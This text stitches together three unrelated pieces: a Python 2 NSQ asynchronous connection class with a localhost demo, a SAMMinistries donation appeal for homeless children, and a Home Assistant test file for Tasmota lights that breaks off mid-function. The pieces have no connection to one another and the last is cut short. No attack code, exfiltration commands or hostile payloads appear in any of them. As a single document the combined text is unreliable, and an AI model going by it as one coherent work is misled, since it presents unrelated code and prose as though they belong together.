import socket import struct import logging import tornado.iostream import nsq class AsyncConn(object): def __init__(self, host, port, connect_callback, data_callback, close_callback, timeout=1.0): assert isinstance(host, (str, unicode)) assert isinstance(port, int) assert callable(connect_callback) assert callable(data_callback) assert callable(close_callback) assert isinstance(timeout, float) self.connecting = False self.connected = False self.host = host self.port = port self.connect_callback = connect_callback self.data_callback = data_callback self.close_callback = close_callback self.timeout = timeout def connect(self): if self.connected or self.connecting: return self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.s.settimeout(self.timeout) self.s.setblocking(0) self.stream = tornado.iostream.IOStream(self.s) self.stream.set_close_callback(self._socket_close) self.connecting = True self.stream.connect((self.host, self.port), self._connect_callback) def _connect_callback(self): self.connecting = False self.connected = True self.stream.write(nsq.MAGIC_V2) self._start_read() try: self.connect_callback(self) except Exception: logging.exception("uncaught exception in connect_callback") def _start_read(self): self.stream.read_bytes(4, self._read_size) def _socket_close(self): self.connected = False try: self.close_callback(self) except Exception: logging.exception("uncaught exception in close_callback") def close(self): self.connected = False self.stream.close() def _read_size(self, data): try: size = struct.unpack('>l', data)[0] self.stream.read_bytes(size, self._read_body) except Exception: self.close() logging.exception("failed to unpack size") def _read_body(self, data): try: self.data_callback(self, data) except Exception: logging.exception("uncaught exception in data_callback") tornado.ioloop.IOLoop.instance().add_callback(self._start_read) def send(self, data): self.stream.write(data) def __str__(self): return self.host + ':' + str(self.port) if __name__ == '__main__': def connect_callback(c): print "connected" c.send(nsq.subscribe('test', 'ch', 'a', 'b')) c.send(nsq.ready(1)) def close_callback(c): print "connection closed" def data_callback(c, data): unpacked = nsq.unpack_response(data) if unpacked[0] == nsq.FRAME_TYPE_MESSAGE: c.send(nsq.ready(1)) msg = nsq.decode_message(unpacked[1]) print msg.id, msg.body c.send(nsq.finish(msg.id)) c = AsyncConn("127.0.0.1", 4150, connect_callback, data_callback, close_callback) c.connect() tornado.ioloop.IOLoop.instance().start()
Children who experience childhood stress, including homelessness, are likely to struggle in school, have behavior issues, and be at higher risk of increased illnesses and emotional problems. As adults, these same children are more likely to have health challenges, engage in risky behavior, and be unemployed or underemployed. The Campaign to End Child Homelessness works to ensure that each child at SAMMinistries’ Transitional Living and Learning Center can achieve his or her full potential. By providing focused, personalized support in a comprehensive, holistic, and integrated manner, every child has the opportunity to succeed. The Campaign to End Child Homelessness affords these at-risk children a window of opportunity that cannot be missed! Your gift of $30 provides safe, secure shelter for a child for one night. Your gift of $182 provides one month of education and enrichment that helps build the foundation a child needs to break the cycle of homelessness. Your gift of $346 provides one month of healthcare access and wellness interventions that support growth and development. It costs $11,000 per year to holistically help a child overcome homelessness. Fill out the form below and become an important part of the lives of the 150 children who call the Transitional Living and Learning Center “home” each year.
"""The tests for the Tasmota light platform.""" import copy import json from hatasmota.const import CONF_MAC from hatasmota.utils import ( get_topic_stat_result, get_topic_tele_state, get_topic_tele_will, ) from homeassistant.components import light from homeassistant.components.light import ( SUPPORT_BRIGHTNESS, SUPPORT_COLOR, SUPPORT_COLOR_TEMP, SUPPORT_EFFECT, SUPPORT_TRANSITION, SUPPORT_WHITE_VALUE, ) from homeassistant.components.tasmota.const import DEFAULT_PREFIX from homeassistant.const import ATTR_ASSUMED_STATE, STATE_OFF, STATE_ON from .test_common import ( DEFAULT_CONFIG, help_test_availability, help_test_availability_discovery_update, help_test_availability_poll_state, help_test_availability_when_connection_lost, help_test_discovery_device_remove, help_test_discovery_removal, help_test_discovery_update_unchanged, help_test_entity_id_update_discovery_update, help_test_entity_id_update_subscriptions, ) from tests.async_mock import patch from tests.common import async_fire_mqtt_message from tests.components.light import common async def test_attributes_on_off(hass, mqtt_mock, setup_tasmota): """Test state update via MQTT.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 1 config["so"]["30"] = 1 # Enforce Home Assistant auto-discovery as light mac = config["mac"] async_fire_mqtt_message( hass, f"{DEFAULT_PREFIX}/{mac}/config", json.dumps(config), ) await hass.async_block_till_done() async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online") async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}') state = hass.states.get("light.test") assert state.attributes.get("effect_list") is None assert state.attributes.get("min_mireds") is None assert state.attributes.get("max_mireds") is None assert state.attributes.get("supported_features") == 0 async def test_attributes_dimmer(hass, mqtt_mock, setup_tasmota): """Test state update via MQTT.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 1 # 1 channel light (dimmer) mac = config["mac"] async_fire_mqtt_message( hass, f"{DEFAULT_PREFIX}/{mac}/config", json.dumps(config), ) await hass.async_block_till_done() async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online") async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}') state = hass.states.get("light.test") assert state.attributes.get("effect_list") is None assert state.attributes.get("min_mireds") is None assert state.attributes.get("max_mireds") is None assert ( state.attributes.get("supported_features") == SUPPORT_BRIGHTNESS | SUPPORT_TRANSITION ) async def test_attributes_ct(hass, mqtt_mock, setup_tasmota): """Test state update via MQTT.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 2 # 2 channel light (CW) mac = config["mac"] async_fire_mqtt_message( hass, f"{DEFAULT_PREFIX}/{mac}/config", json.dumps(config), ) await hass.async_block_till_done() async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online") async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}') state = hass.states.get("light.test") assert state.attributes.get("effect_list") is None assert state.attributes.get("min_mireds") == 153 assert state.attributes.get("max_mireds") == 500 assert ( state.attributes.get("supported_features") == SUPPORT_BRIGHTNESS | SUPPORT_COLOR_TEMP | SUPPORT_TRANSITION ) async def test_attributes_ct_reduced(hass, mqtt_mock, setup_tasmota): """Test state update via MQTT.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 2 # 2 channel light (CW) config["so"]["82"] = 1 # Reduced CT range mac = config["mac"] async_fire_mqtt_message( hass, f"{DEFAULT_PREFIX}/{mac}/config", json.dumps(config), ) await hass.async_block_till_done() async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online") async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}') state = hass.states.get("light.test") assert state.attributes.get("effect_list") is None assert state.attributes.get("min_mireds") == 200 assert state.attributes.get("max_mireds") == 380 assert ( state.attributes.get("supported_features") == SUPPORT_BRIGHTNESS | SUPPORT_COLOR_TEMP | SUPPORT_TRANSITION ) async def test_attributes_rgb(hass, mqtt_mock, setup_tasmota): """Test state update via MQTT.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 3 # 3 channel light (RGB) mac = config["mac"] async_fire_mqtt_message( hass, f"{DEFAULT_PREFIX}/{mac}/config", json.dumps(config), ) await hass.async_block_till_done() async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online") async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}') state = hass.states.get("light.test") assert state.attributes.get("effect_list") == [ "None", "Wake up", "Cycle up", "Cycle down", "Random", ] assert state.attributes.get("min_mireds") is None assert state.attributes.get("max_mireds") is None assert ( state.attributes.get("supported_features") == SUPPORT_BRIGHTNESS | SUPPORT_COLOR | SUPPORT_EFFECT | SUPPORT_TRANSITION ) async def test_attributes_rgbw(hass, mqtt_mock, setup_tasmota): """Test state update via MQTT.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 4 # 5 channel light (RGBW) mac = config["mac"] async_fire_mqtt_message( hass, f"{DEFAULT_PREFIX}/{mac}/config", json.dumps(config), ) await hass.async_block_till_done() async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online") async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}') state = hass.states.get("light.test") assert state.attributes.get("effect_list") == [ "None", "Wake up", "Cycle up", "Cycle down", "Random", ] assert state.attributes.get("min_mireds") is None assert state.attributes.get("max_mireds") is None assert ( state.attributes.get("supported_features") == SUPPORT_BRIGHTNESS | SUPPORT_COLOR | SUPPORT_EFFECT | SUPPORT_TRANSITION | SUPPORT_WHITE_VALUE ) async def test_attributes_rgbww(hass, mqtt_mock, setup_tasmota): """Test state update via MQTT.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 5 # 5 channel light (RGBCW) mac = config["mac"] async_fire_mqtt_message( hass, f"{DEFAULT_PREFIX}/{mac}/config", json.dumps(config), ) await hass.async_block_till_done() async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online") async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}') state = hass.states.get("light.test") assert state.attributes.get("effect_list") == [ "None", "Wake up", "Cycle up", "Cycle down", "Random", ] assert state.attributes.get("min_mireds") == 153 assert state.attributes.get("max_mireds") == 500 assert ( state.attributes.get("supported_features") == SUPPORT_BRIGHTNESS | SUPPORT_COLOR | SUPPORT_COLOR_TEMP | SUPPORT_EFFECT | SUPPORT_TRANSITION | SUPPORT_WHITE_VALUE ) async def test_attributes_rgbww_reduced(hass, mqtt_mock, setup_tasmota): """Test state update via MQTT.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 5 # 5 channel light (RGBCW) config["so"]["82"] = 1 # Reduced CT range mac = config["mac"] async_fire_mqtt_message( hass, f"{DEFAULT_PREFIX}/{mac}/config", json.dumps(config), ) await hass.async_block_till_done() async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online") async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}') state = hass.states.get("light.test") assert state.attributes.get("effect_list") == [ "None", "Wake up", "Cycle up", "Cycle down", "Random", ] assert state.attributes.get("min_mireds") == 200 assert state.attributes.get("max_mireds") == 380 assert ( state.attributes.get("supported_features") == SUPPORT_BRIGHTNESS | SUPPORT_COLOR | SUPPORT_COLOR_TEMP | SUPPORT_EFFECT | SUPPORT_TRANSITION | SUPPORT_WHITE_VALUE ) async def test_controlling_state_via_mqtt_on_off(hass, mqtt_mock, setup_tasmota): """Test state update via MQTT.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 1 config["so"]["30"] = 1 # Enforce Home Assistant auto-discovery as light mac = config["mac"] async_fire_mqtt_message( hass, f"{DEFAULT_PREFIX}/{mac}/config", json.dumps(config), ) await hass.async_block_till_done() state = hass.states.get("light.test") assert state.state == "unavailable" assert not state.attributes.get(ATTR_ASSUMED_STATE) async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online") state = hass.states.get("light.test") assert state.state == STATE_OFF assert not state.attributes.get(ATTR_ASSUMED_STATE) async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}') state = hass.states.get("light.test") assert state.state == STATE_ON async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"OFF"}') state = hass.states.get("light.test") assert state.state == STATE_OFF async_fire_mqtt_message(hass, "tasmota_49A3BC/stat/RESULT", '{"POWER":"ON"}') state = hass.states.get("light.test") assert state.state == STATE_ON async_fire_mqtt_message(hass, "tasmota_49A3BC/stat/RESULT", '{"POWER":"OFF"}') state = hass.states.get("light.test") assert state.state == STATE_OFF async def test_controlling_state_via_mqtt_ct(hass, mqtt_mock, setup_tasmota): """Test state update via MQTT.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 2 # 2 channel light (CT) mac = config["mac"] async_fire_mqtt_message( hass, f"{DEFAULT_PREFIX}/{mac}/config", json.dumps(config), ) await hass.async_block_till_done() state = hass.states.get("light.test") assert state.state == "unavailable" assert not state.attributes.get(ATTR_ASSUMED_STATE) async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online") state = hass.states.get("light.test") assert state.state == STATE_OFF assert not state.attributes.get(ATTR_ASSUMED_STATE) async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}') state = hass.states.get("light.test") assert state.state == STATE_ON async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"OFF"}') state = hass.states.get("light.test") assert state.state == STATE_OFF async_fire_mqtt_message( hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","Dimmer":50}' ) state = hass.states.get("light.test") assert state.state == STATE_ON assert state.attributes.get("brightness") == 127.5 async_fire_mqtt_message( hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","CT":300}' ) state = hass.states.get("light.test") assert state.state == STATE_ON assert state.attributes.get("color_temp") == 300 # Tasmota will send "Color" also for CT light, this should be ignored async_fire_mqtt_message( hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","Color":"255,128"}' ) state = hass.states.get("light.test") assert state.state == STATE_ON assert state.attributes.get("color_temp") == 300 assert state.attributes.get("brightness") == 127.5 async def test_controlling_state_via_mqtt_rgbww(hass, mqtt_mock, setup_tasmota): """Test state update via MQTT.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 5 # 5 channel light (RGBCW) mac = config["mac"] async_fire_mqtt_message( hass, f"{DEFAULT_PREFIX}/{mac}/config", json.dumps(config), ) await hass.async_block_till_done() state = hass.states.get("light.test") assert state.state == "unavailable" assert not state.attributes.get(ATTR_ASSUMED_STATE) async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online") state = hass.states.get("light.test") assert state.state == STATE_OFF assert not state.attributes.get(ATTR_ASSUMED_STATE) async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}') state = hass.states.get("light.test") assert state.state == STATE_ON async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"OFF"}') state = hass.states.get("light.test") assert state.state == STATE_OFF async_fire_mqtt_message( hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","Dimmer":50}' ) state = hass.states.get("light.test") assert state.state == STATE_ON assert state.attributes.get("brightness") == 127.5 async_fire_mqtt_message( hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","Color":"255,128,0"}' ) state = hass.states.get("light.test") assert state.state == STATE_ON assert state.attributes.get("rgb_color") == (255, 128, 0) async_fire_mqtt_message( hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","White":50}' ) state = hass.states.get("light.test") assert state.state == STATE_ON assert state.attributes.get("white_value") == 127.5 # Setting white > 0 should clear the color assert not state.attributes.get("rgb_color") async_fire_mqtt_message( hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","CT":300}' ) state = hass.states.get("light.test") assert state.state == STATE_ON assert state.attributes.get("color_temp") == 300 async_fire_mqtt_message( hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","White":0}' ) state = hass.states.get("light.test") assert state.state == STATE_ON # Setting white to 0 should clear the white_value and color_temp assert not state.attributes.get("white_value") assert not state.attributes.get("color_temp") async_fire_mqtt_message( hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","Scheme":3}' ) state = hass.states.get("light.test") assert state.state == STATE_ON assert state.attributes.get("effect") == "Cycle down" async_fire_mqtt_message(hass, "tasmota_49A3BC/stat/RESULT", '{"POWER":"ON"}') state = hass.states.get("light.test") assert state.state == STATE_ON async_fire_mqtt_message(hass, "tasmota_49A3BC/stat/RESULT", '{"POWER":"OFF"}') state = hass.states.get("light.test") assert state.state == STATE_OFF async def test_sending_mqtt_commands_on_off(hass, mqtt_mock, setup_tasmota): """Test the sending MQTT commands.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 1 config["so"]["30"] = 1 # Enforce Home Assistant auto-discovery as light mac = config["mac"] async_fire_mqtt_message( hass, f"{DEFAULT_PREFIX}/{mac}/config", json.dumps(config), ) await hass.async_block_till_done() async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online") state = hass.states.get("light.test") assert state.state == STATE_OFF await hass.async_block_till_done() await hass.async_block_till_done() mqtt_mock.async_publish.reset_mock() # Turn the light on and verify MQTT message is sent await common.async_turn_on(hass, "light.test") mqtt_mock.async_publish.assert_called_once_with( "tasmota_49A3BC/cmnd/Power1", "ON", 0, False ) mqtt_mock.async_publish.reset_mock() # Tasmota is not optimistic, the state should still be off state = hass.states.get("light.test") assert state.state == STATE_OFF # Turn the light off and verify MQTT message is sent await common.async_turn_off(hass, "light.test") mqtt_mock.async_publish.assert_called_once_with( "tasmota_49A3BC/cmnd/Power1", "OFF", 0, False ) mqtt_mock.async_publish.reset_mock() async def test_sending_mqtt_commands_rgbww(hass, mqtt_mock, setup_tasmota): """Test the sending MQTT commands.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 5 # 5 channel light (RGBCW) mac = config["mac"] async_fire_mqtt_message( hass, f"{DEFAULT_PREFIX}/{mac}/config", json.dumps(config), ) await hass.async_block_till_done() async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online") state = hass.states.get("light.test") assert state.state == STATE_OFF await hass.async_block_till_done() await hass.async_block_till_done() mqtt_mock.async_publish.reset_mock() # Turn the light on and verify MQTT message is sent await common.async_turn_on(hass, "light.test") mqtt_mock.async_publish.assert_called_once_with( "tasmota_49A3BC/cmnd/Backlog", "NoDelay;Fade 0;NoDelay;Power1 ON", 0, False ) mqtt_mock.async_publish.reset_mock() # Tasmota is not optimistic, the state should still be off state = hass.states.get("light.test") assert state.state == STATE_OFF # Turn the light off and verify MQTT message is sent await common.async_turn_off(hass, "light.test") mqtt_mock.async_publish.assert_called_once_with( "tasmota_49A3BC/cmnd/Backlog", "NoDelay;Fade 0;NoDelay;Power1 OFF", 0, False ) mqtt_mock.async_publish.reset_mock() # Turn the light on and verify MQTT messages are sent await common.async_turn_on(hass, "light.test", brightness=192) mqtt_mock.async_publish.assert_called_once_with( "tasmota_49A3BC/cmnd/Backlog", "NoDelay;Fade 0;NoDelay;Dimmer 75", 0, False ) mqtt_mock.async_publish.reset_mock() await common.async_turn_on(hass, "light.test", rgb_color=[255, 128, 0]) mqtt_mock.async_publish.assert_called_once_with( "tasmota_49A3BC/cmnd/Backlog", "NoDelay;Fade 0;NoDelay;Power1 ON;NoDelay;Color2 255,128,0", 0, False, ) mqtt_mock.async_publish.reset_mock() await common.async_turn_on(hass, "light.test", color_temp=200) mqtt_mock.async_publish.assert_called_once_with( "tasmota_49A3BC/cmnd/Backlog", "NoDelay;Fade 0;NoDelay;Power1 ON;NoDelay;CT 200", 0, False, ) mqtt_mock.async_publish.reset_mock() await common.async_turn_on(hass, "light.test", white_value=128) mqtt_mock.async_publish.assert_called_once_with( "tasmota_49A3BC/cmnd/Backlog", "NoDelay;Fade 0;NoDelay;Power1 ON;NoDelay;White 50", 0, False, ) mqtt_mock.async_publish.reset_mock() await common.async_turn_on(hass, "light.test", effect="Random") mqtt_mock.async_publish.assert_called_once_with( "tasmota_49A3BC/cmnd/Backlog", "NoDelay;Fade 0;NoDelay;Power1 ON;NoDelay;Scheme 4", 0, False, ) mqtt_mock.async_publish.reset_mock() async def test_sending_mqtt_commands_power_unlinked(hass, mqtt_mock, setup_tasmota): """Test the sending MQTT commands to a light with unlinked dimlevel and power.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 1 # 1 channel light (dimmer) config["so"]["20"] = 1 # Update of Dimmer/Color/CT without turning power on mac = config["mac"] async_fire_mqtt_message( hass, f"{DEFAULT_PREFIX}/{mac}/config", json.dumps(config), ) await hass.async_block_till_done() async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online") state = hass.states.get("light.test") assert state.state == STATE_OFF await hass.async_block_till_done() await hass.async_block_till_done() mqtt_mock.async_publish.reset_mock() # Turn the light on and verify MQTT message is sent await common.async_turn_on(hass, "light.test") mqtt_mock.async_publish.assert_called_once_with( "tasmota_49A3BC/cmnd/Backlog", "NoDelay;Fade 0;NoDelay;Power1 ON", 0, False ) mqtt_mock.async_publish.reset_mock() # Tasmota is not optimistic, the state should still be off state = hass.states.get("light.test") assert state.state == STATE_OFF # Turn the light off and verify MQTT message is sent await common.async_turn_off(hass, "light.test") mqtt_mock.async_publish.assert_called_once_with( "tasmota_49A3BC/cmnd/Backlog", "NoDelay;Fade 0;NoDelay;Power1 OFF", 0, False ) mqtt_mock.async_publish.reset_mock() # Turn the light on and verify MQTT messages are sent; POWER should be sent await common.async_turn_on(hass, "light.test", brightness=192) mqtt_mock.async_publish.assert_called_once_with( "tasmota_49A3BC/cmnd/Backlog", "NoDelay;Fade 0;NoDelay;Dimmer 75;NoDelay;Power1 ON", 0, False, ) mqtt_mock.async_publish.reset_mock() async def test_transition(hass, mqtt_mock, setup_tasmota): """Test transition commands.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 5 # 5 channel light (RGBCW) mac = config["mac"] async_fire_mqtt_message( hass, f"{DEFAULT_PREFIX}/{mac}/config", json.dumps(config), ) await hass.async_block_till_done() async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online") state = hass.states.get("light.test") assert state.state == STATE_OFF await hass.async_block_till_done() await hass.async_block_till_done() mqtt_mock.async_publish.reset_mock() # Dim the light from 0->100: Speed should be 4*2=8 await common.async_turn_on(hass, "light.test", brightness=255, transition=4) mqtt_mock.async_publish.assert_called_once_with( "tasmota_49A3BC/cmnd/Backlog", "NoDelay;Fade 1;NoDelay;Speed 8;NoDelay;Dimmer 100", 0, False, ) mqtt_mock.async_publish.reset_mock() # Dim the light from 0->50: Speed should be 4*2/2=4 await common.async_turn_on(hass, "light.test", brightness=128, transition=4) mqtt_mock.async_publish.assert_called_once_with( "tasmota_49A3BC/cmnd/Backlog", "NoDelay;Fade 1;NoDelay;Speed 4;NoDelay;Dimmer 50", 0, False, ) mqtt_mock.async_publish.reset_mock() # Fake state update from the light async_fire_mqtt_message( hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","Dimmer":50}' ) state = hass.states.get("light.test") assert state.state == STATE_ON assert state.attributes.get("brightness") == 127.5 # Dim the light from 50->0: Speed should be 6*2/2=6 await common.async_turn_off(hass, "light.test", transition=6) mqtt_mock.async_publish.assert_called_once_with( "tasmota_49A3BC/cmnd/Backlog", "NoDelay;Fade 1;NoDelay;Speed 6;NoDelay;Power1 OFF", 0, False, ) mqtt_mock.async_publish.reset_mock() async def test_relay_as_light(hass, mqtt_mock, setup_tasmota): """Test relay show up as light in light mode.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 1 config["so"]["30"] = 1 # Enforce Home Assistant auto-discovery as light mac = config["mac"] async_fire_mqtt_message( hass, f"{DEFAULT_PREFIX}/{mac}/config", json.dumps(config), ) await hass.async_block_till_done() state = hass.states.get("switch.test") assert state is None state = hass.states.get("light.test") assert state is not None async def _test_split_light(hass, mqtt_mock, config, num_lights, num_switches): """Test multi-channel light split to single-channel dimmers.""" mac = config["mac"] async_fire_mqtt_message( hass, f"{DEFAULT_PREFIX}/{mac}/config", json.dumps(config), ) await hass.async_block_till_done() async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online") await hass.async_block_till_done() await hass.async_block_till_done() assert len(hass.states.async_entity_ids("switch")) == num_switches assert len(hass.states.async_entity_ids("light")) == num_lights lights = hass.states.async_entity_ids("light") for idx, entity in enumerate(lights): mqtt_mock.async_publish.reset_mock() # Turn the light on and verify MQTT message is sent await common.async_turn_on(hass, entity) mqtt_mock.async_publish.assert_called_once_with( "tasmota_49A3BC/cmnd/Backlog", f"NoDelay;Fade 0;NoDelay;Power{idx+num_switches+1} ON", 0, False, ) mqtt_mock.async_publish.reset_mock() # Dim the light and verify MQTT message is sent await common.async_turn_on(hass, entity, brightness=(idx + 1) * 25.5) mqtt_mock.async_publish.assert_called_once_with( "tasmota_49A3BC/cmnd/Backlog", f"NoDelay;Fade 0;NoDelay;Channel{idx+num_switches+1} {(idx+1)*10}", 0, False, ) async def test_split_light(hass, mqtt_mock, setup_tasmota): """Test multi-channel light split to single-channel dimmers.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["rl"][1] = 2 config["rl"][2] = 2 config["rl"][3] = 2 config["rl"][4] = 2 config["so"][68] = 1 # Multi-channel PWM instead of a single light config["lt_st"] = 5 # 5 channel light (RGBCW) await _test_split_light(hass, mqtt_mock, config, 5, 0) async def test_split_light2(hass, mqtt_mock, setup_tasmota): """Test multi-channel light split to single-channel dimmers.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 1 config["rl"][1] = 1 config["rl"][2] = 2 config["rl"][3] = 2 config["rl"][4] = 2 config["rl"][5] = 2 config["rl"][6] = 2 config["so"][68] = 1 # Multi-channel PWM instead of a single light config["lt_st"] = 5 # 5 channel light (RGBCW) await _test_split_light(hass, mqtt_mock, config, 5, 2) async def _test_unlinked_light(hass, mqtt_mock, config, num_switches): """Test rgbww light split to rgb+ww.""" mac = config["mac"] num_lights = 2 async_fire_mqtt_message( hass, f"{DEFAULT_PREFIX}/{mac}/config", json.dumps(config), ) await hass.async_block_till_done() async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online") await hass.async_block_till_done() await hass.async_block_till_done() assert len(hass.states.async_entity_ids("switch")) == num_switches assert len(hass.states.async_entity_ids("light")) == num_lights lights = hass.states.async_entity_ids("light") for idx, entity in enumerate(lights): mqtt_mock.async_publish.reset_mock() # Turn the light on and verify MQTT message is sent await common.async_turn_on(hass, entity) mqtt_mock.async_publish.assert_called_once_with( "tasmota_49A3BC/cmnd/Backlog", f"NoDelay;Fade 0;NoDelay;Power{idx+num_switches+1} ON", 0, False, ) mqtt_mock.async_publish.reset_mock() # Dim the light and verify MQTT message is sent await common.async_turn_on(hass, entity, brightness=(idx + 1) * 25.5) mqtt_mock.async_publish.assert_called_once_with( "tasmota_49A3BC/cmnd/Backlog", f"NoDelay;Fade 0;NoDelay;Dimmer{idx+1} {(idx+1)*10}", 0, False, ) async def test_unlinked_light(hass, mqtt_mock, setup_tasmota): """Test rgbww light split to rgb+ww.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["rl"][1] = 2 config["lk"] = 0 # RGB + white channels unlinked config["lt_st"] = 5 # 5 channel light (RGBCW) await _test_unlinked_light(hass, mqtt_mock, config, 0) async def test_unlinked_light2(hass, mqtt_mock, setup_tasmota): """Test rgbww light split to rgb+ww.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 1 config["rl"][1] = 1 config["rl"][2] = 2 config["rl"][3] = 2 config["lk"] = 0 # RGB + white channels unlinked config["lt_st"] = 5 # 5 channel light (RGBCW) await _test_unlinked_light(hass, mqtt_mock, config, 2) async def test_discovery_update_reconfigure_light( hass, mqtt_mock, caplog, setup_tasmota ): """Test reconfigure of discovered light.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 1 # 1 channel light (Dimmer) config2 = copy.deepcopy(DEFAULT_CONFIG) config2["rl"][0] = 2 config2["lt_st"] = 3 # 3 channel light (RGB) data1 = json.dumps(config) data2 = json.dumps(config2) # Simple dimmer async_fire_mqtt_message(hass, f"{DEFAULT_PREFIX}/{config[CONF_MAC]}/config", data1) await hass.async_block_till_done() state = hass.states.get("light.test") assert ( state.attributes.get("supported_features") == SUPPORT_BRIGHTNESS | SUPPORT_TRANSITION ) # Reconfigure as RGB light async_fire_mqtt_message(hass, f"{DEFAULT_PREFIX}/{config[CONF_MAC]}/config", data2) await hass.async_block_till_done() state = hass.states.get("light.test") assert ( state.attributes.get("supported_features") == SUPPORT_BRIGHTNESS | SUPPORT_COLOR | SUPPORT_EFFECT | SUPPORT_TRANSITION ) async def test_availability_when_connection_lost( hass, mqtt_client_mock, mqtt_mock, setup_tasmota ): """Test availability after MQTT disconnection.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 1 # 1 channel light (Dimmer) await help_test_availability_when_connection_lost( hass, mqtt_client_mock, mqtt_mock, light.DOMAIN, config ) async def test_availability(hass, mqtt_mock, setup_tasmota): """Test availability.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 1 # 1 channel light (Dimmer) await help_test_availability(hass, mqtt_mock, light.DOMAIN, config) async def test_availability_discovery_update(hass, mqtt_mock, setup_tasmota): """Test availability discovery update.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 1 # 1 channel light (Dimmer) await help_test_availability_discovery_update(hass, mqtt_mock, light.DOMAIN, config) async def test_availability_poll_state( hass, mqtt_client_mock, mqtt_mock, setup_tasmota ): """Test polling after MQTT connection (re)established.""" config = copy.deepcopy(DEFAULT_CONFIG) config["rl"][0] = 2 config["lt_st"] = 1 # 1 channel light (Dimmer) poll_topic = "tasmota_49A3BC/cmnd/STATE" await help_test_availability_poll_state( hass, mqtt_client_mock, mqtt_mock, light.DOMAIN, config, poll_topic, "" ) async def test_discovery_removal_light(hass, mqtt_mock, caplog, setup_tasmota): """Test removal of discovered light.""" config1 = copy.deepcopy(DEFAULT_CONFIG) config1["rl"][0] = 2 config1["lt_st"] = 1 # 1 channel light (Dimmer) config2 = copy.deepcopy(DEFAULT_CONFIG) config2["rl"][0] = 0 config2["lt_st"] = 0 await help_test_discovery_removal( hass, mqtt_mock, caplog, 